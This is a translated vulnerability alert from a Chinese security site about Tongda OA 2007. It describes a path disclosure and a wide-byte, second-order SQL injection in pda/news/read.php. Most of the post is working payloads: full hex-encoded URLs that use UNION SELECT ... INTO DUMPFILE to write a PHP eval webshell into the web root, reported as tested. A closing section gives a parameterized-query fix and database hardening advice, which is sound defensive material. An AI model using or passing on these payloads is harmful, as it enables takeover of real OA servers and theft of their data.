Tongda OA 2007 vulnerability and getshell - Vulnerability Alert - 黑吧安全网 (myhack58)

2012-12-18T00:00:00
ID MYHACK58:62201236230
Type myhack58
Reporter Anonymous
Modified 2012-12-18T00:00:00

Description

Tested against Tongda OA 2007.

Office Anywhere 2007 network intelligent office system

http://127.0.0.1/pda/news/read.php?P=%cf' discloses the web root directory (path disclosure).

Looking at the code, the third field of the injected statement's result is picked up further down in the same file by another SELECT statement. That gave me an idea; roughly it works like this.

For example: SELECT * from USER where USER_ID='{$USERNAME}'

Further down, the line $PROVIDER = $ROW['PROVIDER']; takes a field from that result row, and the following statement $query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'"; carries it straight into a second query.

Can the two be chained?

The first statement is where the injection starts. With union select 1,2,3,4,5,6,7,8,9,10,... the 3rd column lands in the PROVIDER field, so we use

union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10

The inner 'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'# is thus carried into the second statement, which writes the webshell.

The question is whether the single quotes survive. Of course they don't, ^_^ and...

So we hex-encode the string instead:

%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23

Tested OK; this gives a webshell on the OA server.

pda/news/read.php?P=%cf'Or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527443a2f4d594f412f776562726f6f742f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
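The root cause is that both lookups described above are assembled by string interpolation: the first from the request, the second from a PROVIDER value read back out of the database. The following is an added example, not Tongda OA's own code, showing the same two lookups with bound parameters so that neither the first-order nor the second-order query can be broken out of; the DSN, table and column names are assumptions based on the statements quoted in the writeup.

```php
<?php
// Added example, not code from Tongda OA: the two lookups the text describes
// (user by USER_ID, then user by the PROVIDER value read from that row),
// rebuilt with bound parameters so neither query is assembled from strings.
// Assumptions: MySQL, a USER table with USER_ID and PROVIDER columns, and a
// DSN plus credentials supplied by the caller (names here are hypothetical).

function connect(string $dsn, string $user, string $pass): PDO
{
    // Real server-side prepares: SQL text and values travel separately, so a
    // wide-byte-prefixed quote such as %cf' stays data instead of closing a
    // string. Put charset=utf8mb4 in the DSN so client and server agree on
    // the encoding; the %cf' trick relies on the two disagreeing.
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

// Replaces: $query = "SELECT * from USER where USER_ID='{$USERNAME}'";
function findUser(PDO $db, string $userId): ?array
{
    $stmt = $db->prepare('SELECT * FROM USER WHERE USER_ID = :id');
    $stmt->execute([':id' => $userId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Replaces: $query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";
// PROVIDER came out of the database rather than the request, which is exactly
// why the original code trusted it; here it is bound like any other input.
function findProvider(PDO $db, array $row): ?array
{
    if (!isset($row['PROVIDER'])) {
        return null;
    }
    return findUser($db, (string) $row['PROVIDER']);
}

// Usage with a hypothetical DSN and account:
// $db   = connect('mysql:host=127.0.0.1;dbname=oa;charset=utf8mb4', 'oa_app', 'secret');
// $user = findUser($db, $_GET['P'] ?? '');
// $prov = $user ? findProvider($db, $user) : null;
```

On the database side the into dumpfile step can be blocked independently of the PHP fix: run the application under a MySQL account without the FILE privilege and set secure_file_priv so the server refuses to write files into the web root.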
